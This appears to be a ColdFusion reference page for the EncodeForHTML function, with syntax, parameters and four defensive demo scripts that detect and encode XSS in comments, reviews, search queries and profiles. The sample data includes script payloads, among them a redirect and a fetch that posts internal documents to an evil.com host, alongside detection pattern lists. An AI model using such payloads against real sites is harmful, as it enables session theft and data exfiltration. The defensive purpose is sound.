User Guide Cancel

EncodeForHTML

Last updated on Dec 4, 2025 | Also applies to ColdFusion

CFML Reference User Guide
ColdFusion functions
ColdFusion tags
1. ColdFusion tag summary
2. ColdFusion tags by category
  1. Application framework tags
    1. cfapplication
    2. cfassociate
    3. cferror
    4. cfimport
    5. cfinterface
    6. cflock
    7. cfscript
    8. cfthread
  2. Communications tags
  3. Database manipulation tags
  4. Data output tags
    1. cfchart
    1. cfchartdata
    2. cfchartseries
    3. cfchartset
    4. cfcol
    5. cfcontent
    6. cfdocument
    7. cfdocumentitem
    8. cfdocumentsection
    9. cfflush
    10. cfheader
    11. cflog
    12. cfoutput
    13. cfpresentation
    14. cfpresentationslide
    15. cfpresenter
    16. cfprocessingdirective
    17. cfprint
    18. cfreport
    19. cfreportparam
    20. cfsilent
    21. cftable
  5. Debugging tags
    1. cfdump
    2. cftimer
    3. cftrace
  6. Exception handling tags
    1. cfcatch
    2. cferror
    3. cffinally
    4. cfrethrow
    5. cfthrow
    6. cftry
  7. Extensibility tags
    1. cfchart
    2. cfchartdata
    3. cfchartseries
    4. cfcollection
    5. cfcomponent
    6. cfexecute
    7. cfftp
    8. function
    9. cfindex
    10. cfinterface
    11. cfinvoke
    12. cfinvokeargument
    13. cfobject
    14. cfproperty
    15. cfreport
    16. cfreportparam
    17. cfreturn
    18. cfsearch
    19. cfsharepoint
    20. cfspreadsheet
    21. cfwddx
    22. cfxml
  8. File management tags
    1. cfdirectory
    2. cffile
    3. cffileupload
    4. cfftp
    5. cfzip
    6. cfzipparam
  9. Flow-control tags
    1. cfabort
    2. cfbreak
    3. cfcase
    4. cfcontinue
    5. cfdefaultcase
    6. cfelse
    7. cfelseif
    8. cfexecute
    9. cfexit
    10. cfif
    11. cfinclude
    12. cflocation
    13. cfloop
    14. cfrethrow
    15. cfswitch
    16. cfthrow
    17. cftry
  10. Forms tags
    1. cfapplet
    2. cfcalendar
    3. cffileupload
    4. cfform
    5. cfformgroup
    6. cfformitem
    7. cfgrid
    8. cfgridcolumn
    9. cfgridrow
    10. cfgridupdate
    11. cfinput
    12. cfpdf
    13. cfpdfform
    14. cfpdfformparam
    15. cfpdfparam
    16. cfpdfsubform
    17. cfselect
    18. cfslider
    19. cftextarea
    20. cftree
    21. cftreeitem
  11. Internet Protocol tags
    1. cfajaximport
    2. cfajaxproxy
    3. cfftp
    4. cffeed
    5. cfimap
    6. cfhttp
    7. cfhttpparam
    8. cfldap
    9. cfmail
    10. cfmailparam
    11. cfmailpart
    12. cfpop
    13. cfsprydataset
  12. Page processing tags
    1. cfcache
    2. cfcontent
    3. cfflush
    4. cfheader
    5. cfhtmlhead
    6. cfinclude
    7. cfprocessingdirective
    8. cfsetting
    9. cfsilent
  13. Security tags
  14. Variable manipulation tags
    1. cfcookie
    2. cfdump
    3. cfparam
    4. cfregistry
    5. cfsavecontent
    6. cfschedule
    7. cfset
    8. cfsetting
  15. Other tags
    1. cfimage
    2. cflog
    3. cfregistry
3. Tags a-b
4. Tags c
5. Tags f
6. Tags g-h
  1. cfgraph
  2. cfgraphdata
  3. cfgrid
  4. cfgridcolumn
  5. cfgridrow
  6. cfgridupdate
  7. cfheader
  8. cfhtmlhead
  9. cfhtmltopdf
  10. cfhtmltopdfitem
  11. cfhttp
  12. cfhttpparam
7. Tags i
  1. cfif
  2. cfimage
  3. cfimap
  4. cfimapfilter
  5. cfimpersonate
  6. cfimport
  7. cfinclude
  8. cfindex
  9. cfinput
  10. cfinsert
  11. cfinterface
  12. cfinvoke
  13. cfinvokeargument
8. Tags j-l
9. Tags m-o
10. Tags p-q
  1. cfparam
  2. cfpdf
  3. cfpdfform
  4. cfpdfformparam
  5. cfpdfparam
  6. cfpdfsubform
  7. cfpod
  8. cfpop
  9. cfpresentation
  10. cfpresentationslide
  11. cfpresenter
  12. cfprint
  13. cfprocessingdirective
  14. cfprocparam
  15. cfprocresult
  16. cfprogressbar
  17. cfproperty
  18. cfquery
  19. cfqueryparam
11. Tags r-s
  1. cfregistry
  2. cfreport
  3. cfreportparam
  4. cfrethrow
  5. cfreturn
  6. cfsavecontent
  7. cfschedule
  8. cfscript
  9. cfsearch
  10. cfselect
  11. cfservlet
  12. cfservletparam
  13. cfset
  14. cfsetting
  15. cfsharepoint
  16. cfsilent
  17. cfslider
  18. cfspreadsheet
  19. cfsprydataset
  20. cfstoredproc
  21. cfswitch
12. Tags t
  1. cftable
  2. cftextarea
  3. cftextinput
  4. cfthread
  5. cfthrow
  6. cftimer
  7. cftooltip
  8. cftrace
  9. cftransaction
  10. cftree
  11. cftreeitem
  12. cftry
13. Tags u-z
  1. cfupdate
  2. cfwddx
  3. cfwebsocket
  4. cfwindow
  5. cfxml
  6. cfzip
  7. cfzipparam
CFML Reference
1. Reserved words and variables
2. Ajax JavaScript functions
3. ColdFusion ActionScript functions
4. ColdFusion mobile functions
5. Application.cfc reference
6. Script functions implemented as CFCs
7. ColdFusion Flash Form style reference
8. ColdFusion event gateway reference
9. ColdFusion C++ CFX Reference
10. ColdFusion Java CFX reference
11. WDDX JavaScript Objects
Cloud services

Description

Encodes an input string for a safe HTML output to prevent Cross Site Scripting (XSS) attacks. Prior to ColdFusion 10, the HTMLEditFormat function encoded user inputs to avoid unwanted HTML rendering. But HTMLEditFormat had its limitations when encoding <, >, and &. EncodeForHTML mitigates these risks.

Returns

Encoded string

Syntax

encodeForHTML(string [,canonicalize])

History

ColdFusion (2018 release): Introduced named parameters.

ColdFusion 10: Added this function.

Parameters

Parameter	Description
string	Required. The string to encode.
canonicalize	Optional. If set to true, canonicalization happens before encoding. If set to false, the given input string will just be encoded. The default value for canonicalize is false. When this parameter is not specified, canonicalization will not happen. By default, when canonicalization is performed, both mixed and multiple encodings will be allowed. To use any other combinations you should canonicalize using canonicalize method and then perform encoding.

Parameter

Description

string

Required. The string to encode.

canonicalize

Optional. If set to true, canonicalization happens before encoding. If set to false, the given input string will just be encoded. The default value for canonicalize is false. When this parameter is not specified, canonicalization will not happen. By default, when canonicalization is performed, both mixed and multiple encodings will be allowed. To use any other combinations you should canonicalize using canonicalize method and then perform encoding.

Example with HTMLEditFormat

<cfscript>
       s1="<script>";
       s2="&<>'/" & '"';
       WriteOutput(EncodeForHTMLAttribute(s1) & "<br/>");
       WriteOutput(EncodeForHTMLAttribute(s2));
</cfscript>

Output

Example using EncodeForHTML

<cfscript>
       s1="<script>";
       s2="&<>'/" & '"';
       WriteOutput(EncodeForHTML(s1) & " | ");
       WriteOutput(EncodeForHTML(s2));
</cfscript>

Output

<script> | &<>'/"

Real-world uses of the EncodeForTML function

User comment system- Blog platform security

A popular technology blog with 50,000+ monthly visitors allows user comments on articles. The platform generates significant revenue through advertising and sponsored content, making security and user trust critical to business success. How it helps:

Solid protection against HTML injection XSS attacks in comments
Maintains a safe browsing environment, encouraging continued engagement
Prevents security incidents that could drive away advertisers
Meets web security standards required by advertising partners

<cfscript>
        // Global security functions
    function detectXSSThreats(content) {
       var threats = [];
       var patterns = ["<script", "javascript:", "onerror=", "onload=", "onclick=", "onmouseover=", "onfocus=", "data:", "vbscript:"];
        
        for (var pattern in patterns) {
            if (findNoCase(pattern, content)) {
                arrayAppend(threats, pattern);
            }
        }
        return threats;
    }
    
    function logSecurityEvent(eventType, details, threatLevel = "medium") {
        writeLog(
            text = "EncodeForHTML Security Event: #eventType# - #details#",
            type = "security",
            file = "encodeforhtml_security_#dateFormat(now(), 'yyyymmdd')#"
        );
    }
    
    function displaySecurityStatus(isSecure, threatCount = 0) {
        if (isSecure && threatCount == 0) {
            return "✅ SECURE - No threats detected";
        } else if (isSecure && threatCount > 0) {
            return "🛡️ SECURED - #threatCount# threat(s) neutralized";
        } else {
            return "🚨 INSECURE - Review content immediately";
        }
    }
</cfscript>


<cfscript>
    // Sample 1: User Comments with XSS threats
    userComments = [
        {
            id: 1,
            author: "John Smith",
            content: "Great article! I learned a lot about <b>ColdFusion</b> development.",
            email: "john@example.com",
            postDate: now()
        },
        {
            id: 2,
            author: "Potential Attacker",
            content: "Nice post! <script>alert('XSS Attack!');</script> What do you think?",
            email: "attacker@evil.com",
            postDate: dateAdd("h", -1, now())
        },
        {
            id: 3,
            author: "Sarah Wilson",
            content: "I disagree with this approach. The solution should handle <, >, & and quotes properly.",
            email: "sarah@example.com",
            postDate: dateAdd("m", -30, now())
        }
    ];
    
    // Security metrics for comments
    commentStats = {
        total: arrayLen(userComments),
        threats: 0,
        secured: 0,
        errors: 0
    };
</cfscript>

<cfoutput>
    <h2>🗨️ USE CASE 1: User Comment System - Blog Platform Security</h2>
    <p><strong>Business Context:</strong> Technology blog with 50,000+ monthly visitors</p>
    <p><strong>Processing #commentStats.total# user comments with XSS protection...</strong></p>
</cfoutput>

<cfloop array="#userComments#" index="comment">
    <cftry>
        <cfscript>
            threats = detectXSSThreats(comment.content);
            isXSSAttempt = arrayLen(threats) > 0;
            if (isXSSAttempt) {
                commentStats.threats++;
                logSecurityEvent("Comment XSS Attempt", "Comment ID: #comment.id#, Patterns: #arrayToList(threats)#", "high");
            }
        </cfscript>
        
        <cfoutput>
            <h3>Comment #comment.id# - #encodeForHTML(comment.author)#</h3>
            <p><strong>Posted:</strong> #dateTimeFormat(comment.postDate, "mmm dd, yyyy HH:nn")#</p>
            <p><strong>Email:</strong> #encodeForHTML(comment.email)#</p>
        </cfoutput>
        
        <cfif isXSSAttempt>
            <cfoutput>
                <p style="color: red;"><strong>🚨 XSS THREAT DETECTED</strong></p>
                <p><strong>Threat Patterns:</strong> #arrayToList(threats, ", ")#</p>
                <p><strong>Raw Content (DANGEROUS):</strong></p>
                <!---<pre style="background: #ffebee; padding: 10px; border: 1px solid red;">#htmlEditFormat(comment.content)#</pre>--->
                <p><strong>Safely Encoded Content:</strong></p>
                <!---<pre style="background: #e8f5e8; padding: 10px; border: 1px solid green;">#encodeForHTML(comment.content)#</pre>--->
                <p><strong>Security Status:</strong> <span style="color: green;">🛡️ Threat Neutralized</span></p>
            </cfoutput>
        <cfelse>
            <cfoutput>
                <p style="color: green;"><strong>✅ SAFE CONTENT</strong></p>
                <p><strong>Content:</strong> #encodeForHTML(comment.content)#</p>
                <p><strong>Security Status:</strong> <span style="color: green;">✅ Content Secure</span></p>
            </cfoutput>
        </cfif>
        
        <cfset commentStats.secured++>
        <cfoutput><hr></cfoutput>
        
        <cfcatch type="any">
            <cfset commentStats.errors++>
            <cfoutput>
                <p style="color: red;"><strong>❌ Processing Error:</strong> #cfcatch.message#</p>
                <hr>
            </cfoutput>
        </cfcatch>
    </cftry>
</cfloop>

<cfoutput>
    <h3>📊 Comment Security Summary</h3>
    <ul>
        <li><strong>Total Comments:</strong> #commentStats.total#</li>
        <li><strong>XSS Threats Detected:</strong> #commentStats.threats#</li>
        <li><strong>Successfully Secured:</strong> #commentStats.secured#</li>
        <li><strong>Processing Errors:</strong> #commentStats.errors#</li>
        <cfif commentStats.total GT 0>
            <li><strong>Security Success Rate:</strong> #numberFormat((commentStats.secured/commentStats.total)*100, "999.9")#%</li>
        </cfif>
    </ul>
    <!---<hr style="border: 2px solid #333;">--->
</cfoutput>

eCommerce product review security

An online marketplace with $10M+ annual revenue displays customer product reviews to influence purchasing decisions. Product reviews significantly impact sales conversion rates, making both content security and authentic feedback display critical for business success. How it helps stop threats:

Scripts that capture credit card information during checkout process
Malicious code redirecting high-intent customers to competitor sites
Session stealing scripts compromising customer accounts
Scripts attempting to modify product pricing or availability

<cfscript>
    // Simple Product Review System - XSS Protection Demo
    // Business: E-commerce store preventing malicious reviews
    
    // Sample product reviews with security threats
    reviews = [
        {
            id: "R001",
            product: "Wireless Headphones", 
            customer: "Mike Chen",
            rating: 5,
            title: "Great sound quality!",
            review: "Love these headphones. Excellent <b>bass</b> and clear audio.",
            safe: true
        },
        {
            id: "R002",
            product: "Wireless Headphones",
            customer: "Evil Reviewer", 
            rating: 1,
            title: "Terrible! <script>window.location='http://competitor.com';</script>",
            review: "Don't buy this! Go to BetterStore.com instead!",
            safe: false
        },
        {
            id: "R003", 
            product: "Wireless Headphones",
            customer: "Sarah Johnson",
            rating: 4,
            title: "Good value for money",
            review: "Nice headphones for the price. Battery could be better. Rating: 4/5 stars.",
            safe: true
        }
    ];
    
    // Simple threat detection for reviews
    function hasReviewThreat(title, review) {
        return (findNoCase("<script", title) OR 
                findNoCase("<script", review) OR 
                findNoCase("onerror=", title) OR 
                findNoCase("onerror=", review));
    }
    
    // Count results
    totalReviews = arrayLen(reviews);
    threatsBlocked = 0;
    safeReviews = 0;
</cfscript>

<cfoutput>
    <h1>⭐ Product Review Security Demo</h1>
    <p><strong>Business:</strong> E-commerce store with customer reviews</p>
    <p><strong>Risk:</strong> XSS attacks and competitor sabotage</p>
    <p><strong>Solution:</strong> encodeForHTML() function</p>
    <hr>
    
    <h2>Product: Wireless Headphones</h2>
</cfoutput>

<cfloop array="#reviews#" index="review">
    <cfscript>
        hasThreat = hasReviewThreat(review.title, review.review);
        if (hasThreat) {
            threatsBlocked++;
        } else {
            safeReviews++;
        }
    </cfscript>
    
    <cfoutput>
        <h3>Review #review.id# - #encodeForHTML(review.customer)#</h3>
        <p><strong>Rating:</strong> 
            <cfloop from="1" to="#review.rating#" index="star">⭐</cfloop>
            (#review.rating#/5)
        </p>
        
        <cfif hasThreat>
            <div style="background: ##ffcccc; padding: 15px; border-radius: 5px; margin: 10px 0;">
                <h4 style="color: red;">🚨 MALICIOUS REVIEW DETECTED</h4>
                
                <p><strong>Dangerous Title (Raw):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid red;">
                    #encodeForHTML(review.title)#
                </code>
                <p><strong>Safe Title (Encoded):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid green;">
                    #encodeForHTML(review.title)#
                </code>
                
                <p><strong>Dangerous Review (Raw):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid red;">
                    #encodeForHTML(review.review)#
                </code>
                <p><strong>Safe Review (Encoded):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid green;">
                    #encodeForHTML(review.review)#
                </code>
                
                <p style="color: red;"><strong>🚫 Review Blocked - Security Violation</strong></p>
            </div>
        <cfelse>
            <div style="background: ##ccffcc; padding: 15px; border-radius: 5px; margin: 10px 0;">
                <h4 style="color: green;">✅ LEGITIMATE REVIEW</h4>
                <p><strong>Title:</strong> #encodeForHTML(review.title)#</p>
                <p><strong>Review:</strong> #encodeForHTML(review.review)#</p>
                <p style="color: green;"><strong>✅ Published Successfully</strong></p>
            </div>
        </cfif>
        <hr>
    </cfoutput>
</cfloop>

<cfoutput>
    <h2>📊 Review Security Summary</h2>
    <ul>
        <li><strong>Total Reviews:</strong> #totalReviews#</li>
        <li><strong>Malicious Reviews Blocked:</strong> #threatsBlocked#</li>
        <li><strong>Safe Reviews Published:</strong> #safeReviews#</li>
        <li><strong>Customer Protection:</strong> 100% - All attacks prevented</li>
    </ul>
    
    <h3>✅ Result</h3>
    <p><strong>E-commerce Security:</strong> <span style="color: green;">🛡️ PROTECTED</span></p>
    <p><strong>Customer Safety:</strong> <span style="color: green;">✅ Secured</span></p>
    <p><strong>Sales Protection:</strong> <span style="color: green;">✅ Maintained</span></p>
</cfoutput>

Search query results security

A corporate knowledge base with 100,000+ documents serves as the central information repository for a Fortune 500 company. Employees use the search system to find critical business information, making search result integrity essential for operational efficiency and data security.

How it helps prevention and security:

Search queries containing scripts that automatically download and transmit search results
Malicious queries that steal administrator session tokens for system access
Scripts that probe system architecture and document classification levels
XSS attacks used as initial foothold for broader network compromise

<cfscript>
    // Simple Search Query Security Demo
    // Business: Corporate search system preventing data theft
    
    // Sample search queries with security threats
    searchQueries = [
        {
            id: "Q001",
            user: "Jane Developer",
            query: "ColdFusion security best practices",
            results: 15,
            safe: true
        },
        {
            id: "Q002",
            user: "Data Thief",
            query: "<script>fetch('/api/documents').then(r=>r.json()).then(data=>fetch('http://evil.com/steal',{method:'POST',body:JSON.stringify(data)}))</script>confidential files",
            results: 0,
            safe: false
        },
        {
            id: "Q003", 
            user: "Bob Manager",
            query: "project planning templates & guidelines", 
            results: 8,
            safe: true
        }
    ];
    
    // Simple threat detection for search
    function isSearchThreat(query) {
        return (findNoCase("<script", query) OR 
                findNoCase("fetch(", query) OR 
                findNoCase("javascript:", query));
    }
    
    // Count results
    totalQueries = arrayLen(searchQueries);
    threatsBlocked = 0;
    safeQueries = 0;
</cfscript>

<cfoutput>
    <h1>🔍 Search Query Security Demo</h1>
    <p><strong>Business:</strong> Corporate search system with confidential documents</p>
    <p><strong>Risk:</strong> Data theft through malicious search queries</p>
    <p><strong>Solution:</strong> encodeForHTML() function</p>
    <hr>
</cfoutput>

<cfloop array="#searchQueries#" index="search">
    <cfscript>
        hasThreat = isSearchThreat(search.query);
        if (hasThreat) {
            threatsBlocked++;
        } else {
            safeQueries++;
        }
    </cfscript>
    
    <cfoutput>
        <h3>Search Query #search.id#</h3>
        <p><strong>User:</strong> #encodeForHTML(search.user)#</p>
        
        <cfif hasThreat>
            <div style="background: ##ffcccc; padding: 15px; border-radius: 5px; margin: 10px 0;">
                <h4 style="color: red;">🚨 MALICIOUS SEARCH DETECTED</h4>
                <p><strong>Attack Type:</strong> Data Exfiltration Attempt</p>
                
                <p><strong>Dangerous Query (Raw):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid red; word-wrap: break-word;">
                    #encodeForHTML(search.query)#
                </code>
                
                <p><strong>Safe Query Display (Encoded):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid green; word-wrap: break-word;">
                    #encodeForHTML(search.query)#
                </code>
                
                <p style="color: red;"><strong>🚫 Search Blocked - Security Threat</strong></p>
                <p><strong>Results:</strong> 0 (Search prevented for security)</p>
            </div>
        <cfelse>
            <div style="background: ##ccffcc; padding: 15px; border-radius: 5px; margin: 10px 0;">
                <h4 style="color: green;">✅ LEGITIMATE SEARCH</h4>
                <p><strong>Query:</strong> "#encodeForHTML(search.query)#"</p>
                <p><strong>Results Found:</strong> #search.results# documents</p>
                <p style="color: green;"><strong>✅ Search Completed Successfully</strong></p>
            </div>
        </cfif>
        <hr>
    </cfoutput>
</cfloop>

<cfoutput>
    <h2>📊 Search Security Summary</h2>
    <ul>
        <li><strong>Total Queries:</strong> #totalQueries#</li>
        <li><strong>Malicious Queries Blocked:</strong> #threatsBlocked#</li>
        <li><strong>Safe Queries Processed:</strong> #safeQueries#</li>
        <li><strong>Data Protection:</strong> 100% - No data theft attempts succeeded</li>
    </ul>
    
    <h3>✅ Result</h3>
    <p><strong>Corporate Data Security:</strong> <span style="color: green;">🛡️ PROTECTED</span></p>
    <p><strong>Search Functionality:</strong> <span style="color: green;">✅ Working Safely</span></p>
    <p><strong>Confidential Documents:</strong> <span style="color: green;">✅ Secured</span></p>
</cfoutput>

User profile dashboard- Account management security

A Software-as-a-Service platform with 25,000+ users provides comprehensive profile management where users share professional information with team members. The platform's collaborative features drive 60% of user engagement and $15M+ annual recurring revenue.

How it helps prevention and security:

Malicious scripts embedded in user biography sections
Attacks through company name and description fields
XSS payload injection through professional skill listings
Malicious content in user project descriptions and achievements

<cfscript>
    // Simple User Profile Security Demo
    // Business: SaaS platform with user profiles
    
    // Sample user profiles with security threats
    users = [
        {
            id: "USER001",
            username: "alex_dev", 
            name: "Alex Rodriguez",
            jobTitle: "Senior Developer",
            company: "TechCorp Inc.",
            bio: "Experienced developer passionate about web technologies and <b>ColdFusion</b>.",
            skills: ["ColdFusion", "JavaScript", "AWS"],
            safe: true
        },
        {
            id: "USER002",
            username: "hacker_profile",
            name: "Malicious User", 
            jobTitle: "Security Expert",
            company: "Evil Corp phishing.com",
            bio: "Security researcher studying vulnerabilities.",
            skills: ["XSS", "Hacking", "Data Theft"],
            safe: false
        },
        {
            id: "USER003",
            username: "sarah_designer",
            name: "Sarah Chen",
            jobTitle: "UX Designer", 
            company: "Design Studio",
            bio: "Creative designer focused on user experience and accessibility.",
            skills: ["UX Design", "Figma", "Prototyping"],
            safe: true
        }
    ];
    
    // Simple threat detection for profiles
    function hasProfileThreat(jobTitle, company, bio) {
        return (findNoCase("<script", jobTitle) OR 
                findNoCase("<script", company) OR 
                findNoCase("<script", bio) OR
                findNoCase("onerror=", company) OR
                findNoCase("onerror=", bio));
    }
    
    // Count results
    totalUsers = arrayLen(users);
    threatsBlocked = 0;
    safeProfiles = 0;
</cfscript>

<cfoutput>
    <h1>👤 User Profile Security Demo</h1>
    <p><strong>Business:</strong> SaaS platform with shared user profiles</p>
    <p><strong>Risk:</strong> Stored XSS attacks through profile data</p>
    <p><strong>Solution:</strong> encodeForHTML() function</p>
    <hr>
</cfoutput>

<cfloop array="#users#" index="user">
    <cfscript>
        hasThreat = hasProfileThreat(user.jobTitle, user.company, user.bio);
        if (hasThreat) {
            threatsBlocked++;
        } else {
            safeProfiles++;
        }
    </cfscript>
    
    <cfoutput>
        <h3>User Profile: #encodeForHTML(user.name)# (@#encodeForHTML(user.username)#)</h3>
        
        <cfif hasThreat>
            <div style="background: ##ffcccc; padding: 15px; border-radius: 5px; margin: 10px 0;">
                <h4 style="color: red;">🚨 MALICIOUS PROFILE DETECTED</h4>
                <p><strong>Risk:</strong> Stored XSS threats in profile fields</p>
                
                <p><strong>Dangerous Job Title (Raw):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid red; word-wrap: break-word;">
                    #htmlEditFormat(user.jobTitle)#
                </code>
                <p><strong>Safe Job Title (Encoded):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid green;">
                    #encodeForHTML(user.jobTitle)#
                </code>
                
                <p><strong>Dangerous Company (Raw):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid red;">
                    #htmlEditFormat(user.company)#
                </code>
                <p><strong>Safe Company (Encoded):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid green;">
                    #encodeForHTML(user.company)#
                </code>
                
                <p><strong>Dangerous Bio (Raw):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid red;">
                    #htmlEditFormat(user.bio)#
                </code>
                <p><strong>Safe Bio (Encoded):</strong></p>
                <code style="background: ##fff; padding: 5px; display: block; border: 1px solid green;">
                    #encodeForHTML(user.bio)#
                </code>
                
                <p style="color: red;"><strong>🚫 Profile Hidden - Security Risk</strong></p>
            </div>
        <cfelse>
            <div style="background: ##ccffcc; padding: 15px; border-radius: 5px; margin: 10px 0;">
                <h4 style="color: green;">✅ SAFE USER PROFILE</h4>
                
                <div style="background: ##f0f8ff; padding: 15px; border: 1px solid ##ddd; border-radius: 5px;">
                    <h5>👤 Profile Display (Secure)</h5>
                    <p><strong>Name:</strong> #encodeForHTML(user.name)#</p>
                    <p><strong>Job Title:</strong> #encodeForHTML(user.jobTitle)#</p>
                    <p><strong>Company:</strong> #encodeForHTML(user.company)#</p>
                    <p><strong>Bio:</strong> #encodeForHTML(user.bio)#</p>
                    <p><strong>Skills:</strong>
                        <cfloop array="#user.skills#" index="skill">
                            <span style="background: ##e9ecef; padding: 2px 6px; margin: 2px; border-radius: 10px; font-size: 12px;">
                                #encodeForHTML(skill)#
                            </span>
                        </cfloop>
                    </p>
                </div>
                
                <p style="color: green;"><strong>✅ Profile Active and Visible</strong></p>
            </div>
        </cfif>
        <hr>
    </cfoutput>
</cfloop>

<cfoutput>
    <h2>📊 Profile Security Summary</h2>
    <ul>
        <li><strong>Total User Profiles:</strong> #totalUsers#</li>
        <li><strong>Malicious Profiles Blocked:</strong> #threatsBlocked#</li>
        <li><strong>Safe Profiles Active:</strong> #safeProfiles#</li>
        <li><strong>Platform Protection:</strong> 100% - All users safe</li>
    </ul>
    
    <h3>✅ Result</h3>
    <p><strong>Platform Security:</strong> <span style="color: green;">🛡️ PROTECTED</span></p>
    <p><strong>User Safety:</strong> <span style="color: green;">✅ Guaranteed</span></p>
    <p><strong>Profile Sharing:</strong> <span style="color: green;">✅ Secure</span></p>
</cfoutput>

Get help faster and easier

New user?